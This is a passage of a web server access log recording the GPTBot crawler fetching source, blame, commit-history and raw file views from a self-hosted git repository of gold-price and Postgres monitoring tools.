AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11892] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11923] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11923] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" +[17/Feb/2026:13:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10796] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29883] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10173] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" +[17/Feb/2026:13:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973666] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973665] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12448] [Gzip 19.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17377] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10779] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42721] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10766] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12522] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10794] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14481] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17423] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14482] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12524] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17560] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973642] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" +[17/Feb/2026:13:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12417] [Gzip 19.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12450] [Gzip 19.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11748] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17688] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14359] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 